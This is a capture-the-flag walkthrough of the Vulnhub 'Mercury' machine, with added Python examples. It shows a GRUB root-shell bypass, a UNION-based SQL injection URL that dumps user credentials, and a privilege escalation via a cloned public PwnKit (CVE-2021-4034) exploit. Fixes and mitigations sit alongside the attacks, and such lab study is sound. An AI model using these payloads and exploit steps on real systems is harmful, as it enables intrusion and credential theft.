
Vulnhub walkthrough: The Planets: Mercury

2022-06-25 19:13:00 Czheisenberg

THE PLANETS: MERCURY

Preparation

Attacker: Kali
Target: THE PLANETS: MERCURY, NAT, on the 192.168.91.0 network segment
Download link:
https://www.vulnhub.com/entry/the-planets-mercury,544/
On first boot the target did not obtain an IP address, so I booted it into a root shell from the GRUB menu to fix the network interface configuration file.
Hold Shift while the VM boots to bring up the GRUB menu:
On that screen press e to edit the boot entry.
Find the kernel line and replace ro quiet (and whatever follows it) with: rw single init=/bin/bash
rw mounts the root filesystem read-write so the file can be edited, and init=/bin/bash makes the kernel start a root shell instead of init, with no password asked. This is also why console access to a VM is as good as root unless the bootloader is password-protected and the disk is encrypted.
Then press Ctrl+X to boot the edited entry. Once in the shell, run lsb_release -a to identify the release:
It is Ubuntu 20.04. As is well known, newer Ubuntu releases keep the IP address configuration under /etc/netplan/*** (*** being whatever the file is actually called). First check the network interface name (for example with ip link):
It is ens33, so edit the configuration file:
vi /etc/netplan/00-installer-config.yaml
Change the stale interface name in the file to ens33 and save it. Then reboot (sync, then reboot -f, since no init system is running in this shell); Linux now boots normally and picks up an address.
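The fix above, as an added example that is not code from the page or from the Mercury box. Ubuntu's installer writes the interface name it saw at install time into /etc/netplan/00-installer-config.yaml; once the VM is moved to another hypervisor the kernel names the NIC differently (ens33 here), the key no longer matches a real interface, and DHCP never runs. The script below rewrites that key to match an interface the kernel actually has. The stale name enp0s3 in the sample file is an assumption (the page does not show the original), as is the single-interface DHCP layout, which is what the installer normally writes.

```python
# Added example, not code from the page or the Mercury box: automates the
# netplan fix described above. Assumptions: the old name enp0s3 in the sample
# is made up (the page does not show it), and the file has a single interface
# block with DHCP, as Ubuntu's installer (subiquity) writes it.
import os
import sys

# Constructed sample of the installer-generated file with a stale interface name.
SAMPLE_NETPLAN = """# This is the network config written by 'subiquity'
network:
  ethernets:
    enp0s3:
      dhcp4: true
  version: 2
"""


def list_interfaces(sysfs="/sys/class/net"):
    """Names of the interfaces the kernel actually has, loopback excluded."""
    try:
        return sorted(name for name in os.listdir(sysfs) if name != "lo")
    except FileNotFoundError:
        return []


def rewrite_interface(yaml_text, new_name):
    """Replace the single interface key directly under `ethernets:` with
    new_name. Done as text so it needs no YAML library and preserves the
    file's comments and layout; it refuses files that do not have exactly
    one interface rather than guessing which one to rename."""
    out = []
    in_ethernets = False
    eth_indent = 0
    replaced = 0
    for line in yaml_text.splitlines(keepends=True):
        body = line.rstrip("\n")
        indent = len(body) - len(body.lstrip(" "))
        if body.strip() == "ethernets:":
            in_ethernets = True
            eth_indent = indent
        elif in_ethernets and body.strip():
            if indent <= eth_indent:
                in_ethernets = False  # left the ethernets mapping
            elif indent == eth_indent + 2 and body.rstrip().endswith(":"):
                out.append(" " * indent + new_name + ":\n")  # the interface key
                replaced += 1
                continue
        out.append(line)
    if replaced != 1:
        raise ValueError(f"expected exactly one interface under ethernets:, found {replaced}")
    return "".join(out)


def fix_netplan(path, new_name):
    """Rewrite the file in place and return the new contents."""
    with open(path) as f:
        fixed = rewrite_interface(f.read(), new_name)
    with open(path, "w") as f:
        f.write(fixed)
    return fixed


if __name__ == "__main__":
    # Usage (as root): python3 fix_netplan.py [/etc/netplan/FILE] [IFACE]; then run `netplan apply`.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/netplan/00-installer-config.yaml"
    names = list_interfaces()
    if len(sys.argv) > 2:
        iface = sys.argv[2]
    elif len(names) == 1:
        iface = names[0]
    else:
        sys.exit(f"could not pick an interface from {names}; pass the name explicitly")
    print(fix_netplan(path, iface))
    print("now run: netplan apply")
```

Run it as root on the target and then netplan apply. On a host with more than one non-loopback interface it refuses to guess and asks for the name explicitly.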

Information gathering and exploitation

Host discovery

The target's IP address is 192.168.91.172.

Port scanning

nmap -sV -p- -A -sS 192.168.91.172 -oN nmap_mercury.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-09 17:05 CST
Nmap scan report for 192.168.91.172
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Looking closely at the scan, only two ports are open: 22 and 8080. Port 8080 serves a web application under Python 3.8; the banner WSGIServer/0.2 CPython/3.8.2 is Python's wsgiref server, which Django's development runserver uses.
http://192.168.91.172:8080/
Check whether Django's DEBUG mode is on by requesting any URL that does not exist:
The resulting technical 404 page confirms the site is built with Django and lists the URL patterns from the URLconf: robots.txt and mercuryfacts/. (With DEBUG=True Django prints every configured route on this page, which is exactly why DEBUG must be off in production.) Visit both routes and run a directory scan in parallel.

Directory scanning

dirb http://192.168.91.172:8080/
With the default wordlist dirb finds only robots.txt, and robots.txt contains nothing useful (the nmap output above shows a single Disallow entry for /).
Visit:
http://192.168.91.172:8080/mercuryfacts/
The page offers facts about Mercury.
Clicking "Load a fact" leads to the following page:
http://192.168.91.172:8080/mercuryfacts/1/
Note the number 1 in the path: ids 1 through 8 all return a fact, so the value is evidently used to look up a database row. Test for SQL injection by appending a single quote:
http://192.168.91.172:8080/mercuryfacts/1'/
It errors, which proves the input reaches the SQL parser unescaped. Further testing gives the following payload: it uses an id that matches no row (44) so that only the UNION-selected row is rendered, one column to match the original SELECT, and group_concat to pack every username and password into that column (0x2d is a hyphen, used as the separator):
http://192.168.91.172:8080/mercuryfacts/44%20union%20select%20group_concat(username,0x2d,password)%20from%20users/

This yields several username and password pairs. Try each of them over SSH.
The last pair works: user webmaster with password mercuryisthesizeof0.056Earths (shown in the dump as webmaster-mercuryisthesizeof0.056Earths).
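The injection above, as an added example that is not the Mercury app's source: a Django-style fact lookup that pastes the URL segment into its SQL, beside the parameterised fix, exercised against an in-memory SQLite database. The schema, the rows and the view code are assumptions; the box's real table layout and credentials are not reproduced. SQLite's group_concat accepts at most two arguments and has no 0x2d string literal, so the page's MySQL-style group_concat(username,0x2d,password) is written with || instead.

```python
# Added example, not the Mercury app's source: a Django-style fact lookup
# that concatenates the URL segment into its SQL, beside the parameterised
# fix. Schema, rows and view code are assumptions; the page's MySQL-style
# group_concat(username,0x2d,password) is rewritten with || for SQLite.
import sqlite3


def build_db():
    """Constructed sample data standing in for the app's facts and users tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO facts VALUES (1, 'Mercury is the smallest planet.');
        INSERT INTO facts VALUES (2, 'Mercury has no moons.');
        INSERT INTO users VALUES (1, 'alice', 'hunter2');
        INSERT INTO users VALUES (2, 'bob', 'correcthorse');
    """)
    return conn


def fact_vulnerable(conn, fact_id):
    """The flaw: /mercuryfacts/<fact_id>/ is concatenated straight into the
    query, so the path segment is SQL, not data. Returns the rendered rows."""
    sql = "SELECT fact FROM facts WHERE id = " + fact_id
    return [row[0] for row in conn.execute(sql)]


def fact_safe(conn, fact_id):
    """The fix: validate the type, then bind the value as a parameter so the
    database never parses it as SQL. (With Django's raw cursor the
    placeholder is %s; with the ORM, Fact.objects.filter(pk=fact_id).)"""
    if not fact_id.isdigit():
        raise ValueError("fact id must be a non-negative integer")
    sql = "SELECT fact FROM facts WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(fact_id),))]


def probe(conn, fact_id):
    """The single-quote test from the page: a syntax error back from the
    database means the input reached the SQL parser unescaped."""
    try:
        fact_vulnerable(conn, fact_id)
        return "no error"
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


# Same shape as the page's payload: an id that matches no row (44) so only the
# UNION row is rendered, one column to match SELECT fact, and group_concat to
# fold every credential into that single column.
DUMP_PAYLOAD = "44 UNION SELECT group_concat(username || '-' || password) FROM users"


def dump_credentials(conn):
    """Run the UNION payload through the vulnerable view and split the result
    back into (username, password) pairs."""
    rows = fact_vulnerable(conn, DUMP_PAYLOAD)
    pairs = rows[0].split(",") if rows and rows[0] else []
    return sorted(tuple(p.split("-", 1)) for p in pairs)


if __name__ == "__main__":
    db = build_db()
    print("id=1      ->", fact_vulnerable(db, "1"))
    print("id=1'     ->", probe(db, "1'"))
    print("dump      ->", dump_credentials(db))
    try:
        fact_safe(db, DUMP_PAYLOAD)
    except ValueError as exc:
        print("safe view ->", exc)
```

The type check in fact_safe is what Django's URLconf gives you for free with a converter such as <int:fact_id>; the parameter binding is what stops the remaining string-typed inputs from ever being parsed as SQL.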

Information gathering

The first flag is sitting in the login user's home directory.
grep '/bin/bash$' /etc/passwd
Apart from root, three users have /bin/bash as their login shell: mercury, webmaster (the current user) and linuxmaster.

flag 1

[user_flag_8339915c9a454657bd60ee58776f4ccd]

As usual, the final flag lives in /root, so privilege escalation is needed.
The file mercury_proj/notes.txt (contents shown in the original screenshot) names linuxmaster as the next user to pivot to, with the password stored base64-encoded as bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==, which decodes (echo ... | base64 -d) to:
mercurymeandiameteris4880km

So the credentials are linuxmaster:mercurymeandiameteris4880km

Switch to linuxmaster with su:
The switch succeeds.

SUID privilege escalation

find / -perm -u=s -type f 2>/dev/null
The last entry in the list (pkexec, highlighted in the red box in the screenshot) is the setuid binary behind a local privilege escalation that was disclosed only recently, in January 2022 (PwnKit):
CVE-2021-4034
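The post-login enumeration above (interactive users from /etc/passwd, the setuid search, and whether pkexec is in the CVE-2021-4034 precondition state), as an added example that is not from the page or the box. The passwd excerpt is constructed; /usr/bin/pkexec is the only real identifier, and removing its setuid bit is the published interim mitigation for the CVE.

```python
# Added example, not from the page or the box: the enumeration steps as
# functions that run against sample input and a scratch directory as well as
# a live host. The passwd excerpt below is constructed.
import os
import stat

# Constructed /etc/passwd excerpt (not the box's real file).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mercury:x:1000:1000:mercury:/home/mercury:/bin/bash
webmaster:x:1001:1001::/home/webmaster:/bin/bash
linuxmaster:x:1002:1002::/home/linuxmaster:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
"""

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}


def interactive_users(passwd_text):
    """Users whose login shell is interactive: the `grep /bin/bash` step, but
    matching the shell field exactly instead of a regex over the whole line."""
    users = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) == 7 and fields[6] in INTERACTIVE_SHELLS:
            users.append(fields[0])
    return users


def find_setuid(root):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the
    setuid bit, as (path, owner uid, mode). lstat so symlinks are not followed;
    unreadable entries are skipped, like 2>/dev/null on the command line."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def pkexec_exposed(path="/usr/bin/pkexec"):
    """True when pkexec exists and is setuid root, the precondition for
    CVE-2021-4034. Whether it is actually exploitable depends on the polkit
    build: the fix was backported by distributions into existing version
    numbers, so check the package changelog for the CVE rather than trusting
    `pkexec --version`. Interim mitigation: chmod 0755 /usr/bin/pkexec."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


if __name__ == "__main__":
    with open("/etc/passwd") as f:
        print("interactive users:", interactive_users(f.read()))
    for path, uid, mode in find_setuid("/usr/bin"):
        print(f"setuid {mode} uid={uid} {path}")
    print("pkexec setuid root:", pkexec_exposed())
```

Point find_setuid at / on the target to reproduce the page's list; on a defended host, a pkexec_exposed() result of True on an unpatched package is what the chmod mitigation removes until the package update lands.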
git clone https://github.com/berdav/CVE-2021-4034
Enter the CVE-2021-4034 directory and run make.
This builds the cve-2021-4034 executable; run it directly:
./cve-2021-4034
The exploit drops into a root shell. The last flag is in /root:
Got the flag. This series of target machines is quite interesting.

Summary:

  1. SQL injection (mercuryfacts/<id>/)
  2. CVE-2021-4034 (pkexec)

Copyright notice
This article was written by [Czheisenberg]; when reposting, please include a link to the original. Thanks.
https://yzsam.com/2022/02/202202190520500850.html